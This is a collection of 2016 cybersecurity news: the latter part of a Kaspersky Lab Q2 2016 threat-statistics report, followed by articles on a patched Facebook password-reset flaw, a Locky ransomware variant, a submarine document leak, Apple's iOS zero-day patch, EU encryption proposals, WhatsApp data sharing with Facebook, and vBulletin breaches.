* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

The highest percentage of Kaspersky Lab users attacked by banking Trojans was in Turkey. One of the reasons for the growth in financial threats there was a burst of activity by the Gozi banking Trojan whose developers have joined forces with the creators of the Nymaim Trojan.

In Russia, 2.92% of users encountered a banking Trojan at least once in Q2, placing it second in this ranking.

Brazil rounds off the top three. We expect a surge in financial threats in Latin America in the next quarter due to the Olympic Games in Brazil. This event is just too tempting for cybercriminals to ignore – they regularly use the theme of major sporting events in their attacks to lure potential victims.

The top five countries where users were least affected by banking Trojans were Canada (0.33%), the US (0.4%), the UK (0.4%), France (0.43%) and the Netherlands (0.5%).

The percentage of banking Trojan victims in Italy was 0.62%, in Spain it was 0.83%, while in Germany the figure was 1.03%.

The TOP 10 banking malware familie>

The table below shows the top 10 malware families most commonly used in Q2 2016 to attack online banking users (as a percentage of users attacked):

Name* Percentage of users attacked**
1 Trojan-Spy.Win32.Zbot 15.72
2 Trojan-Banker.Win32.Gozi 3.28
3 Trojan.Win32.Qhost 2.35
4 Trojan-Banker.Win32.Shiotob 2.27
5 Trojan-Banker.Win32.BestaFera 2.12
6 Trojan.Win32.Nymaim 1.98
7 Trojan-Banker.Win32.ChePro 1.90
8 Trojan-Banker.Win32.Banbra 1.77
9 Trojan.Win32.Neurevt 0.67
10 Backdoor.Win32.Shiz 0.66
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

Trojan-Spy.Win32.Zbot in first place is a permanent fixture in the leading positions of this ranking, and it is no coincidence: the source codes of this Trojan became publicly available back in 2012. This has resulted in the emergence of new banking Trojans that have adopted fragments of the Zbot code.

The second quarter of 2016 saw a surge in malicious activity by Trojan.Win32.Nymaim. As a result, this Trojan made it into the top 10 for the first time, going straight in at sixth place. Nymaim was initially designed to block access to valuable data and then demand a ransom (ransomware) to unblock it, but the latest version now also includes banking Trojan functionality for stealing financial information. This can be explained by the fact that the creators of Nymaim and Gozi (which also appears in the Q2 TOP 10 financial risks) have joined forces. Nymaim’s source code now includes fragments of Gozi code that provide attackers with remote access to infected computers.

In Q2 2016, Attempted infections by financial #malware were registered on 1.1M user computers #KLreport #banking
A permanent resident in this ranking and one of the reasons financial threats are so prominent in Brazil is the Trojan-Banker.Win32.ChePro family. This banking malware lets cybercriminals take screenshots, register keystrokes, and read the contents of the clipboard, i.e., it possess functionality capable of attacking almost any online banking system. Criminals are trying to implement new techniques to avoid detection for as long as possible. Some of the Trojans from this family use geolocation or ask for the time zone and the Windows version from the system in order to infect users in a particular region.

Yet another newcomer to the top 10 most active financial threats in Q2 was the Trojan.Win32.Neurevt family. Representatives of this family were first discovered in 2013 and are used by cybercriminals not only to steal user payment data in online banking systems but also to send out spam (some versions, for example, sent spam messages on Skype) and implement DDoS attacks (with the addition of functionality capable of performing the Slowloris HTTP flooding scenario).

Ransomware Trojans

The overall number of cryptor modifications in our virus collection to date is approximately 26,000. A total of 28 new cryptor families and 9,296 new modifications were detected in Q2.

The following graph shows the rise in the number of newly created cryptor modifications over the last two quarters.

IT threat evolution in Q2 2016. Statistics

Number of Trojan-Ransom cryptor modifications (Q1 2016 vs Q2 2016)

Some of the more high-profile or unusual Trojans detected in Q2 2016 are listed below:

CryptXXX (Trojan-Ransom.Win32.CryptXXX)

This cryptor has been widely distributed via exploit kits since April 2016. Its earlier versions contained gaps in the file encryption algorithm which allowed Kaspersky Lab to release a utility to decrypt them. Unfortunately, the attackers have made adjustments to subsequent versions, making it impossible to decrypt the files affected by later CryptXXX modifications.

ZCryptor (Trojan-Ransom.MSIL.Zcryptor)

This malware combines cryptor functionality and a worm distribution method. Trojan ransomware does not usually include tools for self-propagation, and ZCryptor just happens to be an exception to this rule. Like a classic worm, while infecting, it creates copies of its body on removable media and generates the autorun.inf file to implement the automatic launch of its executable file once the media is connected to another system (if, of course, autorun is not disabled).

RAA (Trojan-Ransom.JS.RaaCrypt)

Sometimes we come across cryptors that differ from their peers in terms of functionality, and sometimes an unusual implementation will catch the attention of an analyst. In the case of RAA, the choice of programming language was curious: it was written entirely in JavaScript. The whole body of the program was included in a single .js file delivered to the victim as an attachment in a spam message. When run, it displays a fake error message, and in the meantime, encrypts the user’s files.

IT threat evolution in Q2 2016. Statistics

Bart (Trojan-Ransom.Win32.Bart)

This cryptor puts the victim’s files in password-protected ZIP archives; and it creates passwords using the Diffie-Hellman algorithm on an elliptic curve. The design of the ransom note and the payment site is an exact copy of that used by the notorious Locky.

Satana (Trojan-Ransom.Win32.Satan)

This is a combination of MBR blocker and file cryptor, probably inspired by similar functionality in the notorious Petya + Mischa Trojans. Satana, unlike Petya, does not encrypt MFT; in fact, its MBR module is obviously incomplete because the process of checking the password entered by the victim results in nothing more than a continuous cycle. Below is a fragment of the code demonstrating this.

IT threat evolution in Q2 2016. Statistics

The number of users attacked by ransomware

IT threat evolution in Q2 2016. Statistics

Number of users attacked by Trojan-Ransom cryptor malware (Q2 2016)

In Q2 2016, 311,590 unique users were attacked by cryptors, which is 16% less than the previous quarter. Approximately 21% of those attacked were in the corporate sector.

It is important to keep in mind that the real number of incidents is several times higher: the statistics reflect only the results of signature-based and heuristic detections, while in most cases Kaspersky Lab products detect encryption Trojans based on behavior recognition models and issue the Generic verdict, which does not distinguish the type of malicious software.

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors**
1 Japan 2.40
2 Italy 1.50
3 Djibouti 1.46
4 Luxembourg 1.36
5 Bulgaria 1.34
6 Croatia 1.25
7 Maldives 1.22
8 Korea 1.21
9 Netherlands 1.15
10 Taiwan 1.04
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

In Q2, half of the top 10 were European countries – one less than the previous quarter.

Japan, which came ninth in Q1, topped the ranking of countries attacked by cryptors with 2.40%: the most widespread cryptor families in the country were Teslacrypt, Locky and Cryakl.

Newcomers to this ranking were Djibouti (1.46%), Korea (1.21%) and Taiwan (1.04%).

Top 10 most widespread cryptor families

Name Verdict* Percentage of users**
1 CTB-Locker Trojan-Ransom.Win32.Onion/Trojan-Ransom.NSIS.Onion 14.59
2 Teslacrypt Trojan-Ransom.Win32.Bitman 8.36
3 Locky Trojan-Ransom.Win32.Locky 3.34
4 Shade Trojan-Ransom.Win32.Shade 2.14
5 Cryrar/ ACCDFISA Trojan-Ransom.Win32.Cryrar 2.02
6 Cryptowall Trojan-Ransom.Win32.Cryptodef 1.98
7 Cryakl Trojan-Ransom.Win32.Cryakl 1.93
8 Cerber Trojan-Ransom.Win32. Zerber 1.53
9 Scatter Trojan-Ransom.BAT.Scatter/Trojan-Downloader.JS.Scatter/Trojan-Dropper.JS.Scatter/Trojan-Ransom.Win32.Scatter 1.39
10 Rakhni Trojan-Ransom.Win32.Rakhni/Trojan-Downloader.Win32.Rakhni 1.13
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

First place in Q2 was occupied by the CTB-Locker (Trojan-Ransom.Win32/NSIS.Onion) family. In second place was the TeslaCrypt family represented by one verdict: Trojan-Ransom.Win32.Bitman. The Trojan-Ransom.JS.Cryptoload verdict, which in the past downloaded malware and was associated with TeslaCrypt, is no longer characteristic of this family only. TeslaCrypt was earlier a major contributor to the statistics, but fortunately ceased to exist in May 2016 – the owners disabled their servers and posted a master key to decrypt files.

In Q2 2016, #crypto #ransomware attacks were blocked on 311,590 computers of unique users #KLreport
Cerber and Cryrar are the only changes to this ranking compared to the previous quarter.

The Cerber cryptor spreads via spam and exploit kits. The cryptor’s site on the Tor network is translated into lots of languages. Cerber’s special features include the following:

It explores the infected system meticulously: checks for the presence of an antivirus, if it is running under a virtual machine (Parallels, VmWare, QEMU, VirtualBox) or Wine, checks for utilities from various researchers and analysts (it does this by searching for certain processes and files on the disk drive), it even has a blacklist of system drive serial numbers.
It checks the keyboard layout and the IP address of the infected system. If it detects that the machine is located in a CIS country, it stops infecting it.
It attempts to bypass antivirus protection by terminating their processes, interrupting services, deleting files.
In addition to notifying users about encryption in the form of TXT and HTML files, as is the case with other families, it also runs the VBS script which reproduces the following voice message: “Attention! Attention! Attention! Your documents, photos, databases and other important files have been encrypted!”
The Cryrar cryptor also known as the Anti Cyber Crime Department of Federal Internet Security Agency (ACCDFISA), Anti-Child Porn Spam Protection, etc. first appeared back in 2012. It has the distinctive feature of placing the victim’s files in password-protected self-extracting RAR archives. According to KSN statistics, it shows no signs of conceding its position to newer rivals.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2016, Kaspersky Lab solutions blocked 171,895,830 attacks launched from web resources located in 191 countries around the world. 54,539,948 unique URLs were recognized as malicious by web antivirus components.

81% of notifications about blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

IT threat evolution in Q2 2016. Statistics

Distribution of web attack sources by country, Q2 2016

The US (35.44%) returned to the top of this ranking in the second quarter. Russia (10.28%) moved up one place to second. The previous quarter’s leader, the Netherlands, dropped to fourth place after its share fell by 17.7 percentage points. Germany completed the Top 3 with a share of 8.9%. Bulgaria left the Top 10, while Canada was a newcomer in ninth place with 0.96%.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

Country* % of unique users attacked**
1 Azerbaijan 32.10
2 Russia 30.80
3 China 29.35
4 Slovenia 27.54
5 Ukraine 27.46
6 Kazakhstan 27.03
7 Vietnam 26.02
8 Algeria 25.63
9 Armenia 25.09
10 Belarus 24.60
11 Brazil 24.05
12 France 22.45
13 Moldova 22.34
14 Kyrgyzstan 22.13
15 Bulgaria 22.06
16 Italy 21.68
17 Chile 21.56
18 Qatar 20.10
19 India 20.00
20 Portugal 19.84
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q2, Azerbaijan moved up from fourth to first place and became the new leader of this ranking with 32.1%. Russia (30.8%) dropped from first to second, while Kazakhstan (27.03%) fell from second to sixth place.

Since the previous quarter, Spain, Lithuania, Croatia and Turkey have all left the TOP 20. The newcomers to this ranking were Bulgaria (22.06%), Chile (21.56%), Qatar (20.10%) and Portugal (19.84%).


The countries with the safest online surfing environments included Canada (15%), Romania (14.6%), Belgium (13.7%), Mexico (13.2%), the US (12.8%), Switzerland (12. 4%), New Zealand (12.1%), Czech Republic (12%), Argentina (9.9%), Japan (9.5%), the Netherlands (8.3), Sweden (8.2%) and Germany (8%).

On average, 19.4% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a fall of 1.8 p.p. compared to Q1 2016.

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2016, Kaspersky Lab’s file antivirus detected 249,619,379 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country* % of unique users**
1 Somalia 65.80
2 Vietnam 63.33
3 Tajikistan 62.00
4 Russia 61.56
5 Kyrgyzstan 60.80
6 Bangladesh 60.19
7 Afghanistan 60.00
8 Armenia 59,74
9 Ukraine 59.67
10 Nepal 59.66
11 Ethiopia 59.63
12 Laos 58.43
13 Kazakhstan 57.72
14 Rwanda 57.33
15 Djibouti 56.07
16 Yemen 55.98
17 Venezuela 55.76
18 Algeria 55.58
19 Cambodia 55.56
20 Iraq 55.55
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

Somalia remained the leader of this ranking in Q2 2016 with 65.8%. Yemen (55.98%) fell from second to sixteenth place, while Vietnam (63.33%) jumped from eighth to second. Tajikistan (62%) rounded off the TOP 3. Russia moved up one place from fifth to fourth, although the figure for that country declined by 2.62 percentage points to 61.56%.

In Q2 2016, 27,403 #mobile #banking Trojans were detected by @kaspersky mobile security products #KLreport
Newcomers to this ranking are Djibouti in fifteenth place (56.07%), Venezuela in seventeenth (55.76%), and Cambodia in nineteenth (55.56%).


The safest countries in terms of local infection risks were Croatia (29%), Singapore (28.4%), Germany (28.1%), Norway (27.6%), the US (27.1%), Switzerland (26.3%), Japan (22.1%), Denmark (21.4%) and Sweden (21.3%).

An average of 43.3% of computers globally faced at least one local threat during Q2 2016, which is 1.2 p.p. less than in the previous quarter.

Hacker reveals How He Could have Hacked Multiple Facebook Accounts
27.8.2016 thehackernews  Hacking
How to Hack a Facebook Account?
That's possibly the most frequently asked question on the Internet today. Though the solution is hard to find, a white hat hacker has just proven how easy it is to hack multiple Facebook accounts with some basic computer skills.
Your Facebook account can be hacked, no matter how strong your password is or how much extra security measures you have taken. No joke!
Gurkirat Singh from California recently discovered a loophole in Facebook's password reset mechanism that could have given hackers complete access to the victim's Facebook account, allowing them to view message conversations and payment card details, post anything and do whatever the real account holder can.
The attack vector is simple, though the execution is quite difficult.
The issue, Gurkirat (@GurkiratSpeca) says, actually resides in the way Facebook allows you to reset your password. The social network uses an algorithm that generates a random 6-digit passcode ‒ that's 10⁶ = 1,000,000 possible combinations ‒ which does not change until gets 'used' (if you request it from mbasic.facebook.com).
"That could possibly mean that if 1 million people request a password within a short amount of time such that no one uses their code to reset the password, then 1,000,0001 person to request a code will get a passcode that someone from the batch has already been assigned," Gurkirat explains in a blog post.
How to Hack Multiple Facebook Accounts?
Gurkirat first collected valid Facebook IDs by making queries to Facebook Graph API starting with 100,000,000,000,000, since Facebook IDs are generally 15-digit long and then visited www.facebook.com/[ID] with a valid ID number in place of [ID].
Once entered, the URL automatically redirected and changed the Facebook ID to the user's username. In this way, first, he was able to make a list of 2 Million valid Facebook usernames.
"I first reported this bug on May 3, 2016, but Facebook didn't believe me such large-scale execution could have been possible. They wanted proof," Gurkirat told The Hacker News. "So I spent close to a month learning and building the infrastructure to target a batch of 2 million Facebook users. I then re-submitted this bug, and they agreed that it indeed was an issue."
Then using a script, hundreds of proxies and random user-agents, Gurkirat automatically initiated the password reset requests for those 2 million users, each assigned a 6-digit password reset code, thus consuming the complete 6-digit range.
Gurkirat then randomly picked a 6-digit number, i.e. 338625, and started the password reset process using a brute forcing script against all those usernames in his list, hoping that this number had been assigned by Facebook to someone in his list of 2 million usernames.
Gurkirat practically executed this thing and managed to find a right password reset code and username combination that allowed him to reset the password and hijack a random user's Facebook account.
Also Read: How to Hack Someones Facebook Account Just by Knowing their Phone Numbers.
Although Facebook has patched the bug after been reported by Gurkirat and rewarded him $500 (that's little less), Gurkirat has doubt that the patch is not "strong enough to mitigate this vulnerability."
"I would have never imagined that a company as big as Facebook would be susceptible to sheer computing power. The efficacy of the bug I found relied on just that," Gurkirat told the Hacker News.
"I was informed by Facebook that the patch has been applied and that they have started throttling aggressively per IP address. Given a much larger pool of IP addresses that can simulate a global network flow combined with little social engineering, I still doubt if their patch is strong enough to mitigate this vulnerability."
However, Facebook provides you an extra layer of security to protect your account against such attacks.
Here's How you can Protect Your Facebook account:
Enable Login Approvals: Users are recommended to enable "Login Approvals" as an extra layer of security in order to prevent their Facebook accounts against these kinds of attacks.
With Login Approvals turned ON, Facebook will send you a 6-digit security code via a text message to your registered cell phone if someone tries to log into your Facebook account from a new computer or device or a different web browser.
So, even if your Facebook username and password are entered by an attacker, that 6-digit security code, which has been delivered to your phone, will still be required to log into your account, preventing hackers from accessing your account.
Enable Login Notification Alerts: Facebook also provides a security feature, "Login Alerts," that send you an email or SMS whenever it suspects an unauthorized user is accessing your account.
If your Facebook account is accessed from a remote device, Facebook sends you an email or SMS alert. If that is an unauthorized access, you can quickly follow the steps listed in the email to disable access for that device.
Use Password Manager: It's a general, must-do advice to have a strong, unique password for every online account. We have listed some best password managers that would help you understand the importance of password manager and choose a suitable one, according to your requirement.

New Locky Ransomware variant uses DLLs for distribution
27.8.2016 thehackernews Virus

A new Locky Ransomware variant has been spotted by researchers at Cyren, it uses DLLs for distribution.
The Locky Ransomware is one of the most popular threats since its first detection in the wild early 2016. The ransomware has evolved over the time, crooks have improved it adding new evasion detection features and changing the distribution methods.

Security experts observe the implementation of sophisticated sandbox evasion techniques, they documented a new strain of the malware that used a new extension (aka Zepto variant) for the encrypted files meanwhile another version was able to use of offline encryption.

When it first appeared in the threat landscape, Locky was leveraging on documents for its distribution, later it used malicious macros, JavaScript attachments and also Windows script (WSF) files.

Recently, experts from the security firm Cyren discovered a new variant that added a supplementary layer of obfuscation to its downloader script. The new strain of Locky is delivered via spam campaigns, each malicious email includes a ZIP-archived JavaScript.

“The email being sent in this latest wave, as often before, uses business finance-related topics to lure users into opening its attachment, which is ZIP-archived JavaScript. Comparing this variant to the earlier variants, it has added another layer of obfuscation which decrypts and executes the real Locky downloader script.” states the analysis published by Cyren.

Locky ransomware new 1

The downloader script works in a way similar to other strain of the Locky ransomware, the downloaded files are decrypted and saved in the Windows Temp directory, but differently from the past, the malicious payload is DLL file instead a .EXE. The DLL library is loaded using rundll32.exe, it leverages a custom packer to prevent anti-malware scanners from detecting it.

Once it is executed, the new Locky ransomware searches for the affected system and network shares for files to encrypt, it uses the .zepto extension for locked file. When the encryption process has been completed, this variant of Locky ransomware drops and displays a ransom payment instruction page.

Researchers noticed that the .onion address provided in the ransom note directs victims to the same Locky decryptor page that has been used in previous campaigns.

“Clicking on the onion link directs the user to the same Locky Decryptor page we have seen in previous Locky waves.” closes the report.

Secret data on DCNS Scorpene submarines leaked online, it could be a disaster.
27.8.2016 thehackernews Hacking

The Australian newspaper published over 22,000 secret documents on six DCNS Scorpene submarines that are being built in India.
According to The Australian, Indian authorities is investigating a security breach that affected the French Submarine Firm DCNS, which is 35 percent owned by Thales.
The investigation started after more than 22,000 pages related to six DCNS Scorpene submarines being built in India were leaked.
“DCNS has been made aware of articles published in the Australian press related to the leakage of sensitive data about Indian Scorpene.This serious matter is thoroughly investigated by the proper French national authorities for Defense Security. This investigation will determine the exact nature of the leaked documents, the potential damages to DCNS customers as well as the responsibilities for this leakage.” reads the press information published by the company.

The journalists at The Australian had reviewed over 4,450 pages on the Scorpene’s underwater sensors, over 4,300 pages on its combat systems, 4,200 pages of data on above-water sensors.

The DCNS claimed it was the victim of economic cyber espionage, a DCNS spokeswoman told Reuters that the security breach could have a dramatic impact on the company due to the exposure of sensitive information related the collaboration of the company with some governments.

“Asked if the leak could affect other contracts, a company spokeswoman said it had come against a difficult commercial backdrop and that corporate espionage could be to blame.” reported the Reuters. “Competition is getting tougher and tougher, and all means can be used in this context,” she said. “There is India, Australia and other prospects, and other countries could raise legitimate questions over DCNS. It’s part of the tools in economic warfare.”

The Australian newspaper published some 22,400 documents containing technical details of six DCNS Scorpene submarines that are being built at a shipyard in Mumbai, India.

“I understand there has been a case of hacking,” Indian Defence Minister Manohar Parrikar told reporters. “We will find out what has happened.”

The DCNS Scorpene submarines are technological jewels, the documents include highly sensitive details of the submarine including manuals and models of the boat’s antennae.

This new generation of submarines has significant intelligence-gathering capabilities, is it equipped with advanced combat systems and high-tech devices for communication.

As anticipated the leaked documents also include secret information related the activities conducted by the French firm with various governments. The leaked files include secret information on sea trials that the Malaysian Navy is conducting with its fleet of DCNS Scorpene submarines. Some documents are related to business information with Chile and Russia, in the first case the company provided radar systems for some Chilean frigates, meanwhile the Russian government received amphibious assault vessels.

In a brief statement, the DCNS said it is aware of the leak on the Indian Scorpenes and noted that the appropriate French authorities are currently investigating the breach. “This investigation will determine the exact nature of the leaked documents, the potential damages to DCNS customers as well as the responsibilities for this leakage.”

The Australian hasn’t revealed the source of the documents but confirmed that the security breach could have serious repercussions on a $38 billion project that the DCNS is currently negotiating with the Australian government.

Apple releases 'Emergency' Patch after Advanced Spyware Targets Human Rights Activist
26.8.2016 thehackernews Vulnerebility
Apple has released iOS 9.3.5 update for iPhones and iPads to patch three zero-day vulnerabilities after a piece of spyware found targeting the iPhone used by a renowned UAE human rights defender, Ahmed Mansoor.
One of the world's most invasive software weapon distributors, called the NSO Group, has been exploiting three zero-day security vulnerabilities in order to spy on dissidents and journalists.
The NSO Group is an Israeli firm that sells spying and surveillance software that secretly tracks a target's mobile phone.
The zero-day exploits have allowed the company to develop sophisticated spyware tools that can access the device location, contacts, texts, calls logs, emails and even microphone.
Apple fixed these three vulnerabilities within ten days after being informed by two security firms, Citizen Lab and Lookout, who conducted a joint investigation.
Background Story: Malware Discovery
Mansoor, 46, ‘Martin Ennals Award’ winner from the United Arab Emirates, received a text message on his iPhone on August 10, from an unknown number.
Mansoor found the message suspicious and knowing that government hackers had already targeted him in the past, he forwarded that message directly to Citizen Lab researcher Bill Marczak.
Citizen Lab brought in Lookout, a San Francisco mobile security company, to help examine the message.
After analyzing the message content, the researchers found that the link led to a sophisticated piece of malware that exploited three different unknown flaws in Apple’s iOS that would have allowed the attackers to get complete control of Mansoor’s iPhone.

Those links, if clicked, "Mansoor’s iPhone would have been turned into a sophisticated bugging device controlled by UAE security agencies," the Citizen Lab explained in a blog post.
"They would have been able to turn on his iPhone’s camera and microphone to record Mansoor and anything nearby, without him being wise about it. They would have been able to log his emails and calls — even those that are encrypted end-to-end. And, of course, they would have been able to track his precise whereabouts."
According to a blog post published by Lookout, the three zero-day flaws, dubbed "Trident" by the firm, involved:
A memory corruption vulnerability in WebKit that could allow hackers to exploit a device when a user clicks on a malicious link.
Two kernel bugs (allowing device jailbreak) that an attacker secretly installs malware on victim’s device to carry out surveillance.
Apple released the patch update, iOS 9.3.5, on Thursday, and labeled it "important," advising its users to install the latest version of iOS as soon as possible to protect their devices against these potential security exploits.
You can install the security update over-the-air (OTA) via your iPhone or iPad's settings.

Germany and France declare War on Encryption to Fight Terrorism
26.8.2016 thehackernews Safety
Yet another war on Encryption!
France and Germany are asking the European Union for new laws that would require mobile messaging services to decrypt secure communications on demand and make them available to law enforcement agencies.
French and German interior ministers this week said their governments should be able to access content on encrypted services in order to fight terrorism, the Wall Street Journal reported.
French interior minister Bernard Cazeneuve went on to say that the encrypted messaging apps like Telegram and WhatsApp "constitute a challenge during investigations," making it difficult for law enforcement to conduct surveillance on suspected terrorists.
Also Read: How to Send and Receive End-to-End Encrypted Emails
The proposal calls on the European Commission to draft a law that would "impose obligations on operators who show themselves to be non-cooperative, in particular when it comes to withdrawing illegal content or decrypting messages as part of an investigation."
The proposed laws would force major technology companies including Apple, WhatsApp, Facebook, Telegram, and many others, to build encryption backdoors into their messaging apps.
The European Union has always been a strong supporter of privacy and encryption, but the recent series of terrorist attacks across both France and Germany this summer, including Normandy church attack carried out by two jihadists who reportedly met on Telegram, which made the countries shout for encryption backdoors loudly.
Although the proposal acknowledges encryption to be a critical part in securing communications and financial transactions, it says that solutions must be found to "enable effective investigation" while protecting users’ privacy.
Privacy advocates have been alarmed by the new proposals, as recent NSA hack just recently proved all of us that no system is hack-proof for hackers with right hacking skills and sufficient resources.
Related Read: Microsoft handed over encrypted messages and Skype calls to NSA
So, what happened to the NSA, which is the highly sophisticated intelligence agency of the world, could happen to encrypted messaging services that would feature an encryption backdoor for law enforcement.
The European Commission is believed to come up with new laws on privacy and security for telecom operators this fall, which would include third-party services such as WhatsApp or Telegram.

WhatsApp to Share Your Data with Facebook — You have 30 Days to Stop It
26.8.2016 thehackernews Safety
WhatsApp to Share Your Data with Facebook
Nothing comes for Free, as "Free" is just a relative term used by companies to develop a strong user base and then use it for their own benefits.
The same has been done by the secure messaging app WhatsApp, which has now made it crystal clear that the popular messaging service will begin sharing its users’ data with its parent company, Facebook.
However, WhatsApp is offering a partial opt-out for Facebook targeted ads and product related purposes, which I will let you know later in this article, but completely opting out of the data-sharing does not seem to be possible.
Let's know what the company has decided to do with your data.
Of course, Facebook is willing to use your data to sell more targeted advertisements.
WhatsApp introduced some significant changes to its privacy policy and T&Cs today which, if accepted once, gives it permission to connect users' Facebook accounts to WhatsApp accounts for the first time, giving Facebook more data about users for delivering more relevant ads on the social network.
The messaging service will also begin pushing users to share some of their account details, including phone numbers, with Facebook, allowing the social network to suggest phone contacts as friends.
When Facebook acquired WhatsApp for $19 Billion in 2014, users were worried about the company's commitment to protecting its users' privacy. But, WhatsApp reassured them that their privacy would not be compromised in any way.
"Respect for your privacy is coded into our DNA, and we built WhatsApp around the goal of knowing as little about you as possible," said WhatsApp co-founder Jan Koum in a blog post published at that time.
Now the WhatsApp users are feeling betrayed by the company's latest move.
However, you need not to worry about the contents of your WhatsApp messages, like words and images, as they are end-to-end encrypted, meaning that even the company cannot read them.
Ultimately, the two companies will be sharing, what they called, a limited amount of user data, which includes phone numbers and other information about users.
No Option to Completely Opt-Out of Data Sharing
If you think WhatsApp is more privacy conscious than Facebook’s Messenger, it is not anymore.
WhatsApp is offering a solution partially to opt out the data sharing, specifically for Facebook ad targeting and product-related purposes.
However, the company notes that data will still be shared "for other purposes such as improving infrastructure and delivery systems, understanding how our services or theirs are used, securing systems, and fighting spam, abuse, or infringement activities."
So, those who are thinking to opt out of the data-sharing entirely: There's no possible way to opt totally out.
Though one short solution is to stop using WhatsApp.
Here's How to opt -out of sharing data for Facebook ad-targeting purpose:
The company has outlined two ways to opt out of the exchange of information with Facebook on its blog.
One way is for those users who have not yet agreed to the new terms of service and privacy policy, so before agreeing to the new terms, follow these simple steps:
When prompted to accept the updated T&Cs, tap Read to expand the full text.
A checkbox option at the bottom of the policy for sharing your data on Facebook will appear.
Untick this option before hitting Agree. This will let you opt out of the data-sharing.
The second option is for those who have already accepted the new T&Cs without unchecking the box to share their information with Facebook.
WhatsApp is also offering a thirty-day window for users to make the same choice via the settings page in the app. To exercise your opt-out in this scenario you need to follow these steps:
Go to Settings → Account → Share my account info in the WhatsApp app
Uncheck the box displayed there within 30 days, as after that this partial opt-out window will expire.
However, WhatsApp states Facebook will still receive your data in some situations.
After introducing end-to-end encryption, WhatsApp has become one of the most popular secure messaging apps, but this sudden shift in its privacy policy may force some users to switch to other secure apps like Telegram and Signal.

vBulletin vulnerabilities exposed more than 27 million users’ records
26.8.2016 securityaffairs Vulnerebility

Security vulnerabilities in the vBulletin platform have exposed more than 27 million accounts, many of them belonging to gamers on mail.ru.
The Data breach monitoring service LeakedSource has disclosed 11 new data breaches. Security vulnerabilities in the vBulletin platform have exposed more than 27 million accounts, the majority of which belongs to three games on mail.ru.

At the time of notification, the researchers from LeakedSource had managed to crack 12,463,300 passwords.

Another data breach suffered by expertlaw.com exposed more than 190,000 accounts, meanwhile, a similar incident on gamesforum.com compromised more than 100,000 accounts.

Giving a close look to the compromised mail.ru accounts they belong from CFire, parapa.mail.ru (ParaPa Dance City game), and tanks.mail.ru (Ground War: Tank game).

The Subdomains belonging to mail.ru that were hacked in August of 2016 are:

cfire.mail.ru – 12,881,787 users, 6,226,196 passwords cracked at the time of this post.
parapa.mail.ru (main game) – 5,029,530 users, 3,329,532 passwords cracked at the time of this post.
parapa.mail.ru (forums) – 3,986,234 users, 2,907,572 passwords cracked at the time of this post.
tanks.mail.ru – 3,236,254 users, 0 passwords cracked at the time of this post.
vBulletin flaws

mail.ru records include usernames, email addresses, IP addresses, and phone numbers. The other accounts compromised include usernames, passwords, email addresses, birthdays, and IP address.

“Not a single website used proper password storage, they all used some variation of MD5 with or without unique salts,” LeakedSource said.

What have in common all the compromised websites?

All of the hacked domains were running unpatched versions of the vBulletin CMS. Hackers exploited SQL Injection vulnerabilities in the Forumrunner add-on on vBulletin installations older than 4.2.2 or 4.2.3 to access their database.

Once again the wrong security posture is the root cause of these data breaches, million of users’ records exposed due to security issues fixed by vBulletin months ago.

“A security issue has been reported to us that affects vBulletin 4. We have released security patches for vBulletin 4.2.2 & 4.2.3 to account for this vulnerability. The issue could potentially allow attackers to perform SQL Injection attacks via the included Forumrunner add-on.” states the security advisory issued by vBulletin in June. “It is recommended that all users update as soon as possible. If you’re using a version of vBulletin 4 older than 4.2.2, it is recommended that you upgrade to the latest version as soon as possible. Please note that you need to update regardless of whether you have Forumrunner enabled. You can download the patch for your version here: http://members.vbulletin.com/patches.php“

In August a new security update was issued to fix multiple vulnerabilities exploited by hackers in the wild.

Linux.PNScan Trojan is back to compromise routers and install backdoors
26.8.2016 securityaffairs Virus

The Linux Trojan Linux.PNScan is back and it is actively targeting routers based on x86 Linux in an attempt to install backdoors on them.
Yesterday I wrote about a new Linux Trojan dubbed Linux.Rex.1, a new Linux malware that is capable of self-spreading and creating a peer-to-peer botnet, now experts from Malware Must Die discovered a new strain of malware that emerged more than a year ago.

